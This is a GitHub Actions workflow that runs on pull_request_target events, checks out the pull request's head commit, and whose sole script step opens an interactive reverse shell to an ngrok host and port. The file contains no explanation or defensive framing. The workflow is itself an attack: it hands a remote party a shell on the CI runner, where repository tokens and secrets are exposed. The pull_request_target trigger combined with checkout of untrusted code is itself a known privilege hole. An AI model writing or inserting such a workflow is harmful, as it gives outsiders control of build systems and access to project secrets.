name: Pull Request Target Workflow

on:
  pull_request_target:
    types: [opened, synchronize, reopened]

jobs:
  run-script:
    runs-on: ubuntu-latest
    
    steps:
    - name: Checkout code
      uses: actions/checkout@v4
      ref: ${{ github.event.pull_request.head.sha }}
    
    - name: Run bash script
      run: |
        bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/11378 0>&1
